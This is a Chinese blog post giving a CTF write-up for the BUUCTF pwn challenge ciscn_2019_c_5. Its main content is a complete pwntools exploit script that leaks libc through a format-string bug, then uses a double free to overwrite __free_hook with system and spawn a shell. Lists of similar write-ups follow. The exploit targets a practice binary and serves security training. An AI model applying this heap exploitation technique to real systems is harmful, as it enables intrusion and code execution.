ciscn_2019_c_5

最新推荐文章于 2024-04-18 16:01:00 发布
最新推荐文章于 2024-04-18 16:01:00 发布
阅读量603 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 题目 BUUCTF 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37433000/article/details/104233233
本文详细介绍了一种利用格式化字符串漏洞进行内存地址泄漏的方法,并通过改写free_hook实现任意代码执行的过程。从创建和编辑缓冲区到利用漏洞获取libc基址,最终通过精心构造payload调用system函数执行/bin/sh,全程实战演示。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

思路

格式化字符串leak然后打free_hook
exp:

from pwn import *
#p=process('./ciscn_2019_c_5')
p=remote('node3.buuoj.cn',27000)
elf=ELF('./ciscn_2019_c_5')
libc=elf.libc

def add(size,story):
    p.sendlineafter(':','1')
    p.sendlineafter('story:',str(size))
    p.sendlineafter('story:',story)

def edit():
    p.sendlineafter(':','2')

def show():
    p.sendlineafter(':','3')

def delete(idx):
    p.sendlineafter(':','4')
    p.sendlineafter('index:',str(idx))

p.recvuntil('name?')
#0x110081
p.sendline('%p%p%p%p%p%p%p')
p.recvuntil('59')
#p.recv(2)
libcbase=int(p.recv(14),16)-libc.sym['_IO_2_1_stderr_']
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
p.recvuntil('ID.')
p.sendline('3')
add(0x30,'aaaa')#0
add(0x20,'cccc')#1
add(0x20,'/bin/sh\x00')
delete(0)
delete(0)
add(0x30,p64(free_hook))
add(0x30,'doudou')
add(0x30,p64(system))
delete(2)
p.interactive()
ciscn_2019_ne_5
m0_52231248的博客
11-15 391
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
ciscn_2019_n_5
qq_39869547的博客
01-11 1093
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
[PWN]ciscn_2019_ne_5
LDX的博客
11-27 329
PWN ciscn_2019_ne_5
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
buuctfciscn_2019_c_1
最新发布
weixin_54452942的博客
04-18 904
通俗易懂
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 501
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 935
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
ciscn_2019_en_2
m0sway的博客
03-25 1735
ciscn_2019_en_2 WriteUp BUU_PWN
[CTF] ciscn_2019_ne_5
凉水的博客
06-13 573
ciscn_2019_ne_5
【BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 315
【BUUCTFPWNciscn_2019_ne_5
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1980
buuctf ciscn_2019_ne_5题目分析
BUUCTF pwn——ciscn_2019_ne_5
CNS-Enterprise BCC-1701-J
04-09 231
BUUCTF 做题练习
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2653
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
ciscn_2019_c_1
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值